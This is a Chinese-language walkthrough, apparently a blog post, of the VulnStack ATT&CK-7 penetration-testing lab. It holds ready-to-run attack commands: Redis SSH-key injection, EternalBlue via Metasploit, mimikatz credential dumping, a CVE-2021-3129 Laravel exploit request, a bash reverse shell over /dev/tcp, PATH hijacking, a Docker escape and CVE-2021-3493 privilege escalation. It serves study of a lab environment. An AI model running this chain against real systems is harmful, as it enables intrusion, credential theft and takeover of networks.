VulnStack-ATT&CK-7(红日7)一刷

服务器渗透

信息收集

namp -sV -n -v 192.168.3.0/24

发现192.168.3.7

nmap -sV -n -v -p 1-65535 192.168.3.7

在这里插入图片描述

未授权访问redis

redis-cli -h 192.168.3.7

未授权GetShell

#生成公钥
ssh-keygen -t rsa
#将公钥导入1.txt文件
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt 
#把1.txt文件内容写入目标主机的redis缓冲中
cat 1.txt | redis-cli -h 192.168.43.229 -p 6379 -x set hello
config set dir /root/.ssh                #设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    #设置保存文件名为authorized_keys
save                                     #将数据保存在目标服务器硬盘上
ssh 192.168.43.229                       #连接                    

得到的是root权限

第一层内网渗透

信息收集

ifconfig

在这里插入图片描述

第二张网卡192.168.52.10,判断在内网中,执行下面命令扫描内网存活主机

for k in $(seq 1 254); do ping -c 1 192.168.52.$k | grep "ttl" | awk -F'[ :]+' '{print $4}'; done

发现该内外中存在192.168.52.20,192.168.52.30

FRP开代理

kali

nohup ./frps -c frps.ini &
python3 -m http.server 8080

ubuntu

wget http://192.168.3.3:8080/frpc
wget http://192.168.3.3:8080/frpc.ini
chmod +x frpc
nohup ./frpc -c frpc.ini &

nmap信息收集

nmap -sV -p -n 192.168.52.20
nmap -sV -p -n 192.168.52.30

192.168.52.20开启了22、8000等端口,为Linux系统

192.168.52.30开启了445、8080等端口,为Windows系统

永恒之蓝

msfconsole
setg Proxies socks5:192.168.3.3:6005
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.52.30

在这里插入图片描述

查一下网卡信息

shell ipconfig

发现还存在192.168.93.20

第二层内网渗透

KSCAN扫描

上传kscan后进行扫描

kscan_windows_amd64.exe -t 192.168.93.0/24

发现存活192.168.93.10(linux)、192.168.93.20(win)、192.168.93.30(win)、192.168.93.40(win)

在这里插入图片描述

30、40都开放445,可以尝试永恒之蓝攻击,攻击前我们先使用frp搭建隧道进第二次内网也就是192.168.93.0网段

看看域控DC是哪个

ping whoamianony.org

在这里插入图片描述

抓一下明文密码

upload ~/tq/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
sekurlsa::logonPasswords

在这里插入图片描述

发现域控管理明文密码,下面就是开代理链接域控DC

FRP代理

# frps2.ini  kali

echo '[common]
bind_addr = 0.0.0.0
bind_port = 7788' >frps2.ini

nohup ./frps -c frps2.ini &
# frps3.ini Net1 PC ubuntu

echo '[common]
bind_addr = 192.168.52.10
bind_port = 7799' > frps3.ini

nohup ./frps -c frps3.ini &
# frpc2.ini Net1 PC ubuntu

echo '[common]
server_addr = 192.168.3.3
server_port = 7788
[http_proxy]
type = tcp
local_ip = 192.168.52.10
local_port = 1080
remote_port = 1080' > frpc2.ini

nohup ./frpc -c frpc2.ini &
# frpc3.ini Net2 PC windows
echo '[common]
server_addr = 192.168.52.10
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5' > frpc3.ini

frpc.exe -c frpc3.ini

到目前为止,1080端口是第二层网络代理,也就是可以访问192.168.93.0/24,6005端口是第一层,访问192.168.52.0/24

连接DC

proxychains4 python3 wmiexec-pro.py 'Administrator:Whoami2021@192.168.93.30' exec-command -shell

在这里插入图片描述

其余主机渗透

WIN7

msfconsole
setg Proxies socks5:192.168.3.3:1080
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.93.40
set lport 4466
run

在这里插入图片描述

除上面的主机外,第一层网络还存在一个ubuntu192.168.52.20没GetShell

Ubuntu

信息收集
proxychains4 nmap -sV -n -v 192.168.52.20

发现8000端口开着,挂代理访问发现是laravel,这个界面和我们直接访问192.168.3.7:81是一样的,说明192.168.3.7在做反代,这里我们对192.168.3.7:81进行渗透测试

GetShell

可以参考laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

使用下面数据包验证CVE-2021-3129

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.3.7:81
Content-Type: application/json
Content-Length: 168

{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "jack",
"viewFile": "jack1"
}
}

在这里插入图片描述

漏洞存在,使用https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

python3 laravel-CVE-2021-3129-EXP.py http://192.168.3.7:81

在这里插入图片描述

接着使用哥斯拉2连接

在这里插入图片描述

为docker环境,我的这里什么都执行不了,注意这个终端是192.168.52.20的,我们将它反弹回192.168.52.10

bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/65432 <&1'

在这里插入图片描述

查找高权限文件

find / -perm -u=s -type f 2>/dev/null

发现/home/jobs/shell

在这里插入图片描述

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/jobs
./shell
python -c 'import pty;pty.spawn("/bin/bash")'
Docker逃逸

192.168.52.20

cd /
mkdir hello
mount /dev/sda1 /hello
ls /hello

192.168.52.10

ssh-keygen -f hack
chmod 600 hack

192.168.52.20

cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDH0Pj+AghZo27EjM48eai0FNI/AiJExG6QISl315grBY4yRXlwb1mo6sUnHPRfkUs1XIJq/Ogc1FxFGr3S8VypKMD7cGOsBuGjALgfiXXEGyh4yzuWKG7O+OgAAfEHb4/LwiG8fWcixl14NCxEP7SozIdPhkI17JcFTAy70RmxdoYNJsD+Qa0b4m2gX7kiB5fVrnF266JQwDjpXOSoL8BrAMoTBuJk947OGSlVyZVD40TllLP6q4odylnZ3KS4CUv8p2z8hZoS+W6yUGZoeB6LzS2udqQ1/DDX1qGFH2llra57XCREuoykixGIwXw4HeVTcTPxTa4Ampy3pDHkfKmh root@ubuntu' > /hack/home/ubuntu/.ssh/authorized_keys
cat /hack/home/ubuntu/.ssh/authorized_keys

192.168.52.20

ssh -i hack ubuntu@192.168.52.20
权限提升
uname -a

在这里插入图片描述

存在CVE-2021-3493

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)

先下载到192.168.52.10,再从192.168.52.10下载到192.168.52.20,下载好后执行

gcc exploit.c -o exploit
./exploit
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

相关链接

mimikatz使用:

https://www.cnblogs.com/n3w1492/p/13734279.html#:~:text=msf%E4%B8%AD%E7%9A%84mimik

frp多层隧道:

利用Frp建立多层代理_frp多级代理-优快云博客

CVE-2021-3129利用:

laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

CVE-2021-3493利用:

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值